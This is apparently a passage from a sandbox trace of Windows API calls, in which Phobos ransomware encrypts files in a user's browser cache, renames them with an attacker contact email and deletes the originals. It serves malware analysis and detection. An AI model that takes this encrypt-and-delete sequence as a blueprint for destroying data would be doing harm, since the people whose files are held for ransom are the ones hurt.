lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x34d0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x34d0, lpOverlapped=0x0) returned 1 [0180.201] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d68) returned 1 [0180.201] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0180.201] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0180.201] CryptDestroyKey (hKey=0xa32d68) returned 1 [0180.201] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0180.201] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0180.201] CloseHandle (hObject=0x134) returned 1 [0180.201] CloseHandle (hObject=0xb8) returned 1 [0180.201] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\f[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\f[1].txt")) returned 1 [0180.202] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0180.202] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\index[1].htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\index[1].htm"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0180.206] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=46792) returned 1 [0180.206] CloseHandle (hObject=0xb8) returned 1 [0180.207] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\index[1].htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\index[1].htm")) returned 0x2020 [0180.207] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\index[1].htm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\index[1].htm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0180.207] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\index[1].htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\index[1].htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0180.207] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0180.207] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0180.207] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\index[1].htm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\index[1].htm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0180.208] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ae8) returned 1 [0180.208] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0180.208] ReadFile (in: hFile=0xb8, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xb6c8, lpOverlapped=0x0) returned 1 [0180.249] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xb6d0, dwBufLen=0xb6d0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xb6d0) returned 1 [0180.249] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xb6d0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xb6d0, lpOverlapped=0x0) returned 1 [0180.251] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32aa8) returned 1 [0180.251] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0180.251] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0180.251] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0180.251] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0180.251] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0180.251] CloseHandle (hObject=0xb8) returned 1 [0180.251] CloseHandle (hObject=0x134) returned 1 [0180.251] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\index[1].htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\index[1].htm")) returned 1 [0180.252] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0180.252] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\print[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\print[1].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0180.255] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=162) returned 1 [0180.255] CloseHandle (hObject=0x134) returned 1 [0180.255] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\print[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\print[1].txt")) returned 0x2020 [0180.255] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\print[1].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\print[1].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0180.255] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\print[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\print[1].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0180.255] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0180.255] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0180.255] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\print[1].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\print[1].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0180.256] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ae8) returned 1 [0180.256] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0180.256] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xa2, lpOverlapped=0x0) returned 1 [0180.283] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xb0, dwBufLen=0xb0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xb0) returned 1 [0180.283] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xb0, lpOverlapped=0x0) returned 1 [0180.286] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32aa8) returned 1 [0180.286] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0180.286] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0180.286] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0180.286] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0180.286] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0180.286] CloseHandle (hObject=0x134) returned 1 [0180.286] CloseHandle (hObject=0xb8) returned 1 [0180.286] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\print[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\print[1].txt")) returned 1 [0180.287] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0180.287] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\tecjslog[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\tecjslog[1].png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0180.289] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=103) returned 1 [0180.289] CloseHandle (hObject=0xb8) returned 1 [0180.289] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\tecjslog[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\tecjslog[1].png")) returned 0x2020 [0180.289] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\tecjslog[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\tecjslog[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0180.289] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\tecjslog[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\tecjslog[1].png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0180.289] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0180.289] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0180.289] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\tecjslog[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\tecjslog[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0180.290] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32aa8) returned 1 [0180.290] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0180.290] ReadFile (in: hFile=0xb8, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x67, lpOverlapped=0x0) returned 1 [0180.356] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x70, dwBufLen=0x70 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x70) returned 1 [0180.356] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x70, lpOverlapped=0x0) returned 1 [0180.357] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ae8) returned 1 [0180.357] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0180.357] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0180.357] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0180.357] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0180.358] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0180.358] CloseHandle (hObject=0xb8) returned 1 [0180.358] CloseHandle (hObject=0x134) returned 1 [0180.358] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\tecjslog[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\tecjslog[1].png")) returned 1 [0180.359] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0180.359] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\uhf-main.var.min[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\uhf-main.var.min[1].js"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0180.360] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=66282) returned 1 [0180.360] CloseHandle (hObject=0x134) returned 1 [0180.360] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\uhf-main.var.min[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\uhf-main.var.min[1].js")) returned 0x2020 [0180.360] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\uhf-main.var.min[1].js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\uhf-main.var.min[1].js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0180.360] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\uhf-main.var.min[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\uhf-main.var.min[1].js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0180.360] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0180.360] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0180.360] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\uhf-main.var.min[1].js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\uhf-main.var.min[1].js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0180.361] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32aa8) returned 1 [0180.361] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0180.366] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x102ea, lpOverlapped=0x0) returned 1 [0180.675] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x102f0, dwBufLen=0x102f0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x102f0) returned 1 [0180.676] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102f0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102f0, lpOverlapped=0x0) returned 1 [0180.677] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ae8) returned 1 [0180.677] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0180.677] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0180.677] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0180.677] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0180.677] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0180.677] CloseHandle (hObject=0x134) returned 1 [0180.677] CloseHandle (hObject=0xb8) returned 1 [0180.678] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\uhf-main.var.min[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\uhf-main.var.min[1].js")) returned 1 [0180.679] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0180.679] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0180.679] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=67) returned 1 [0180.679] CloseHandle (hObject=0xb8) returned 1 [0180.679] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\desktop.ini")) returned 0x2006 [0180.680] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0180.680] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, 